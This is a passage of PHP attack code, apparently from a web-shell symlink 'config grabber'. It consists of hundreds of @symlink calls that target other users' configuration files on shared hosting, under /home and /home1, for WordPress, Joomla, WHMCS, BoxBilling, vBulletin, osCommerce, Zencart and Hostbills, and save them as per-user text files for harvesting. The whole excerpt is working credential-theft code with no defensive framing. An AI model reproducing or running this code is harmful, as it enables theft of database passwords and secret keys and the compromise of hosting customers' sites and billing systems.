  681. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  682. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  683. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  684. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  685. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  686. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  687. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  688. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  689. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  690. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  691. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  692. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  693. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  694. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  695. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  696. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  697. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  698. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  699. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  700. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  701. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  702. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  703. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  704. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  705. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  706. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  707. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  708. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  709. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  710. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  711. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  712. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  713. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  714. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  715. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  716. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  717. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  718. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  719. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  720. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  721. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  722. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  723. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  724. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  725. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  726. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  727. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  728. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  729. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  730. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  731. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  732. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  733. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  734. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  735. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  736. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  737. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  738. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  739. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  740. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  741. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  742. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  743. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  744. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  745. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  746. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  747. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  748. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  749. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  750. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  751. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  752. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  753. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  754. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  755. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  756. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  757. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  758. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  759. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  760. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  761. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  762. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  763. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  764. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  765. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  766. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  767. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  768. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  769. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  770. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  771. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  772. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  773. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  774. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  775. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  776. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  777. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  778. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  779. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  780. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  781. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  782. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  783. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  784. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  785. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  786. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  787. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  788. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  789. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  790. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  791. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  792. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  793. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  794. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  795. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  796. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  797. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  798. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  799. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  800. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  801. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  802. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  803. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  804. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  805. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  806. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  807. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  808. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  809. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  810. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  811. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  812. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  813. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  814. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  815. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  816. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  817. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  818. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  819. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  820. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  821. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  822. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  823. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  824. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  825. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  826. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  827. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  828. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  829. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  830. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  831. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  832. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  833. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  834. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  835. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  836. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  837. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  838.  
  839. //Home1
  840.  
  841. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  842. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  843. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  844. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  845. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  846. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  847. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  848. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  849. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  850. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  851. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  852. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  853. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  854. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  855. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  856. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  857. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  858. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  859. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  860. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  861. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  862. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  863. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  864. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  865. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  866. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  867. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  868. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  869. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  870. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  871. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  872. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  873. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  874. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  875. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  876. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  877. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  878. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  879. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  880. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  881. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  882. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  883. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  884. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  885. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  886. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  887. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  898. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  899. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  900. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  901. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  902. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  903. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  904. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  905. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  906. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  907. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  908. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  909. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  910. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  911. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  912. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  913. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  914. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  915. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  916. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  917. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  918. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  919. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  920. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  921. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  922. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  923. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  924. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  925. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  926. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  927. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  928. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  929. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  930. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  931. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  932. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  933. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  934. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  935. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  936. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  937. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  938. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  939. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  940. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  941. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  942. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  943. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  944. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  945. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  946. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  947. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  948. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  949. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  950. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  951. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  952. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  953. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  954. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  955. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  956. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  957. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  958. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  959. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  960. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  961. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  962. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  963. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  964. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  965. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  966. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  967. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  968. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  969. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  970. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  971. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  972. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  973. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  974. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  975. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  976. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  977. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  978. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  979. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  980. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  981. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  982. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  983. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  984. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  985. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  986. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  987. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  988. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  989. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  990. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  991. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  992. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  993. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  994. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  995. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  996. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
